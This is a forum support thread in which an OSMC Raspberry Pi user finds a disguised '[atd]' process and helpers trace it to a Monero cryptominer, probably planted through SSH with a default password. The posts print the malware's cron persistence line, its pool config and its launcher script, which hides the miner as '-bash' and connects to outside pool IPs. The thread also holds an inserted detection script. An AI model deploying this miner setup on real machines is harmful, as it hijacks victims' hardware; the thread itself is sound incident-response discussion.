[atd] strange process hogging cpu

Hello, I have a fresh installation of osmc and on top of clean installation, I have deluged, deluge-web and openvpn - installed via apt-get and flexget which was installed via official procedure. I also have some addons on kodi, installed from official kodi repository - those are trakt, watchdog, auto subs, XBMC check previous episode. I don’t have any 3rd party repositories on kodi.

I have noticed strange process called [atd] running under osmc user. This process keeps cpu at 100% and raspberry is around 80C.

If I kill the process, it will respawn after some time (usually a day). Furthermore, I do not have at nor atd installed - and they cannot be found on the system.

I doubt this is some kind of a malware or mining software. I see also there’s a cron entry under osmc user which I did not create: * * * * * /tmp/.xm/upd >/dev/null 2>&1

contents of the /tmp/.xm are:

-rw-r--r-- 1 osmc osmc 26 Jun 22 21:07 .a
-rw-r--r-- 1 osmc osmc 0 Jun 22 21:00 .aa
drwxr-xr-x 2 osmc osmc 4096 Jun 23 00:57 .jk
-rwxr-xr-x 1 osmc osmc 329 Oct 27 2017 a
-rw-r--r-- 1 osmc osmc 1 Jun 23 20:10 bash.pid
-rwxr-xr-x 1 osmc osmc 2318 Apr 22 11:14 c
-rw-r--r-- 1 osmc osmc 7571 Apr 19 21:37 config.txt
-rw-r--r-- 1 osmc osmc 39 Jun 22 21:00 cron.d
-rw-r--r-- 1 osmc osmc 9 Jun 22 21:00 dir.dir
-rwxr-xr-x 1 osmc osmc 15125 Feb 20 2016 h32
-rwxr-xr-x 1 osmc osmc 838583 Feb 20 2016 h64
-rw-r--r-- 1 osmc osmc 1299781 Jun 17 08:34 jk.tgz
-rwxr-xr-x 1 osmc osmc 227220 May 4 14:18 md32
-rw-r--r-- 1 osmc osmc 1500 Jun 11 17:11 pools.txt
-rwxr-xr-x 1 osmc osmc 558 May 28 21:40 run
drwxr-xr-x 2 osmc osmc 4096 May 25 23:34 stak
-rwxr--r-- 1 osmc osmc 173 Jun 22 21:00 upd
-rwxr-xr-x 1 osmc osmc 24 Oct 4 2017 x
-rwxr-xr-x 1 osmc osmc 76 Apr 17 13:58 z

ps -ef | grep -i atd:

osmc 2459 1 99 Jun22 ? 1-01:15:07 [atd]

root@osmc:/tmp# file /proc/2459/exe
/proc/2459/exe: symbolic link to /usr/bin/perl

How do I eradicate this and how do I track down where it came from?

Thanks!
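A defender-side check for the two clues in the post above, added here and not taken from the thread: a process whose name in ps is bracketed like a kernel thread while its /proc/<pid>/exe points at an interpreter (here [atd] backed by /usr/bin/perl), and a per-user crontab line that runs something out of a hidden directory under /tmp. The interpreter list and the 90% CPU threshold are assumptions; scan_proc() walks a live Linux /proc tree and needs root to see other users' exe links.

```python
import os
import re
from pathlib import Path

INTERPRETERS = {"perl", "python", "python2", "python3", "bash", "sh", "php"}  # assumed list
TMP_DIRS = r"/(?:tmp|var/tmp|dev/shm)/"
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")

def process_findings(name, exe, cpu_pct=0.0):
    """Reasons a process looks wrong: name is the ps CMD column, exe the target of /proc/<pid>/exe (None for a real kernel thread)."""
    reasons = []
    if name.startswith("[") and name.endswith("]") and exe is not None:
        # ps brackets only kernel threads (empty cmdline); a userland binary in brackets rewrote its argv[0]
        reasons.append("kernel-thread-style name but backed by " + exe)
    base = os.path.basename(exe) if exe else ""
    if base in INTERPRETERS and name.strip("[]") != base:
        reasons.append(f"name {name!r} hides interpreter {exe}")
    if cpu_pct >= 90:  # assumed threshold; the poster's [atd] sat at 99%
        reasons.append(f"{cpu_pct:g}% CPU")
    return reasons

def cron_findings(line):
    """Reasons a crontab line looks like persistence for a dropped payload."""
    m = None if line.lstrip().startswith("#") else CRON_LINE.match(line)
    if not m:
        return []
    checks = [(r"(^|\s)" + TMP_DIRS, "runs a command from a world-writable temp dir"),
              (TMP_DIRS + r"\.", "payload sits in a hidden directory under that temp dir")]
    return [why for pat, why in checks if re.search(pat, m.group("cmd"))]

def scan_proc(proc="/proc"):
    """Walk a Linux /proc tree and return {pid: reasons} for flagged processes."""
    hits = {}
    if not os.path.isdir(proc):  # not a Linux host
        return hits
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            argv0 = Path(f"{proc}/{pid}/cmdline").read_bytes().split(b"\0")[0].decode(errors="replace")
            comm = Path(f"{proc}/{pid}/comm").read_text().strip()
            try:
                exe = os.readlink(f"{proc}/{pid}/exe")
            except FileNotFoundError:
                exe = None  # genuine kernel thread (or zombie): no exe at all
        except (PermissionError, ProcessLookupError, FileNotFoundError):
            continue  # another user's process without root, or it exited mid-scan
        # mimic ps -ef, which prints "[comm]" when cmdline is empty
        name = os.path.basename(argv0) if argv0 else f"[{comm}]"
        if reasons := process_findings(name, exe):
            hits[int(pid)] = reasons
    return hits
```

Run cron_findings() over the output of `crontab -l` for each user (the poster's entry was under osmc) and scan_proc() as root; anything flagged deserves the `file /proc/<pid>/exe` look the poster did.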

Creating a hidden file under /tmp seems fairly suspicious to me. Take a look at the actual content of some of those temp files and maybe you will get an idea of what it is.

atd is the at daemon. at jobs are similar to cron jobs (but started differently). at is not normally installed on OSMC, so one of the packages you installed had to have added it. And it should not be running at 100%.


It is suspicious. Some of the files are ASCII (text) and there are 3 executables, one 32-bit and one 64-bit.

root@osmc:/tmp/.xm# cat pools.txt
/*
 * pool_address - Pool address should be in the form "pool.supportxmr.com:3333". Only stratum pools are supported.
 * wallet_address - Your wallet, or pool login.
 * rig_id - Rig identifier for pool-side statistics (needs pool support).
 * pool_password - Can be empty in most cases or "x".
 * use_nicehash - Limit the nonce to 3 bytes as required by nicehash.
 * use_tls - This option will make us connect using Transport Layer Security.
 * tls_fingerprint - Server's SHA256 fingerprint. If this string is non-empty then we will check the server's cert against it.
 * pool_weight - Pool weight is a number telling the miner how important the pool is. Miner will mine mostly at the pool
 * with the highest weight, unless the pool fails. Weight must be an integer larger than 0.
 *
 * We feature pools up to 1MH/s. For a more complete list see M5M400's pool list at www.moneropools.com
 */

"pool_list" :
[
        {"pool_address" : "185.148.147.132:8080", "wallet_address" : "xxx", "pool_password" : "x", "use_nicehash" : true, "rig_id" : "", "use_tls" : false, "tls_fingerprint" : "", "pool_weight" : 1 },
],

/*
 * Currency to mine. Supported values:
 *
 *    aeon7 (use this for Aeon's new PoW)
 *    cryptonight (try this if your coin is not listed)
 *    cryptonight_lite
 *    edollar
 *    electroneum
 *    graft
 *    intense
 *    karbo
 *    monero7 (use this for Monero's new PoW)
 *    sumokoin
 *
 */

"currency" : "monero7",

root@osmc:/tmp/.xm# cat run
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://45.32.155.230:3333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmr-stak >>/dev/null &
fi
echo $! > bash.pid

Like I said, packages were mostly from official apt repos except for flexget, which I doubt was the source of this. Also, this thing is running under the osmc user so I suspect this came from some of the kodi addons - but the thing is, all of them were official addons so I’m confused.

There’s your answer. You somehow got a miner :wink:

Back up and re-install would be your best bet, and this time be more careful about what you install.

You could look through your apt logs to see if you can figure out what package installed atd.

The thing is, this has already happened recently. I have tried to track it down and failed so I reinstalled the whole damn thing. Previously I had 3rd party streaming addon and I was almost 100% sure that was the source of it. This time, I did not install any 3rd party addons to kodi. So the only thing that’s not from official packages is flexget but I really doubt that is the source. Especially since flexget is running under root while this thing is running under osmc user.

So this has happened before?

A process running as root can spawn processes running as other users. But, it may not be part of flexget. It may be bundled with the flexget installation scripts. Since that’s the only non-official thing that you’ve installed, that’s the best one to look at.

Re-install without flexget and see if the problem is gone. Then you will know for sure.

Try looking at the apt logs. You may get a clue from them how atd got installed. Note that atd is not bad, but apparently being used for bad things.

Yes, it has happened recently. This installation is just a few days old. atd is not installed (nor is at), and this thing is masking itself under the atd process name. I might reinstall but I’d rather track it down if possible - or remove it completely. I’m gonna post on the flexget forums now, but if they are distributing this (which I really doubt they are), I don’t think they will say “hey, yeah, we pushed a cryptocurrency miner to your box”.

Share your apt logs, there may be a clue there:

$ grab-logs -a

You don’t have your ssh port open to the world do you? If you do I hope you changed your osmc password to something secure.

https://paste.osmc.tv/yijowoyoce

I do have ssh open but osmc is running on a private IP, sshd on 22, but there is no rule to forward to 22 - I have a high random port that is being translated/redirected to port 22. There is no evidence of someone logging in from the internet:

osmc@osmc:~$ last
root     pts/0        192.168.1.60     Sat Jun 23 20:56   still logged in
root     pts/0        192.168.1.60     Sat Jun 23 20:01 - 20:31  (00:30)
root     pts/0        192.168.1.60     Sat Jun 23 19:59 - 20:00  (00:01)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00   still running
root     pts/0        192.168.1.60     Thu Jun 21 23:33 - 23:34  (00:00)
root     pts/0        192.168.1.60     Wed Jun 20 19:35 - 19:38  (00:02)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00   still running
root     pts/0        192.168.1.60     Wed Jun 20 19:05 - down   (00:29)
root     pts/1        192.168.1.60     Wed Jun 20 18:54 - down   (00:40)
root     pts/0        192.168.1.60     Wed Jun 20 18:53 - 19:05  (00:12)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 19:35 (17702+17:35)
root     pts/0        192.168.1.60     Wed Jun 20 18:41 - down   (00:11)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 18:52 (17702+16:52)
osmc     pts/0        192.168.0.118    Wed Jun 20 18:35 - 18:35  (00:00)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 18:35 (17702+16:35)
reboot   system boot  4.14.34-2-osmc   Thu Jan  1 01:00 - 13:29 (17691+11:29)

From the logs, I don’t see anything suspicious installed. So again, it points to how you installed flexget. And it’s interesting that flexget does not show in the logs.

But…

This is dangerous if you did not change the osmc password!

[EDIT] Thinking more about this, I now strongly suspect that it’s ssh that’s your problem. You won’t see someone logged in; the bot would have found you, installed its payload and left in a hurry. So I’d say re-install and this time do not open 22 (or forward it to another port) unless you change the password to a strong password, or better yet only allow ssh logins using a key.

Flexget was installed following official installation procedure, here: https://flexget.com/InstallWizard/Linux

But if a bot did this, there would be a trace somewhere? I have also posted on flexget forums so in case no one there is willing to track it down, I’ll reinstall then.

One thing I did notice, it looks like you installed cron? Just want to make sure it was you. [EDIT] I’m guessing you installed cron for flexget?

There may be. Full logs could have a clue somewhere.

Once I knew that you had ssh open, it became obvious to me that flexget probably is not the problem, ssh is.

You could try cleaning up by fixing your crontab:

$ crontab -e

and also remove the /tmp/.xm directory. Also check your .profile for any nastiness and then reboot.

Yes, cron was installed by me (flexget is running via cron under the root account). When this happened for the first time, I tried that - removing the cron entry and removing the /tmp/.xm directory - and it came back. After that I removed all the addons and again cleared the crontab, and it came back again. Then I reinstalled. I’m gonna try again, maybe ssh really was the issue (the previous installation also had the default password for the osmc user).

Re-installing would probably be your quickest fix. I don’t know enough about how those bots operate to be able to help you figure out how to clean up the mess it left behind. It would take longer to figure it out than to re-install (and we may not totally clean up its mess).

Let us know if it was indeed ssh causing the problem.


From reading the installation instructions that you linked, you don’t need to install cron:

Using systemd/timers
If your system is running with systemd you can directly configure it to run the command every hour as the current user with the following command:

systemd-run --on-active="1h" --uid=`id -u` --gid=`id -g` `which flexget` execute
This will prompt you for the root password (as system services require root to be configured) and then will let you know the name of the service. You can confirm it was scheduled by looking at the system.d scheduler with systemctl list-timers.

Also from the official installation guide:

FlexGet is meant to be executed from users own crontab, not from /etc/crontab (root). Although this is possible it is highly discouraged.

So if you do decide to use cron, use the osmc user, not root.

Right. I’ve been running flexget under cron for so long I didn’t even see this option. Just changed to systemd with the osmc user.

A portscan would find that port and try it, probably using osmc/osmc. The first thing an intruder does is remove all traces of the break-in. Don’t know if you changed the password, but I would do it before opening any port to the device.

I would reinstall.

last -9 may also show you other people that accessed your device.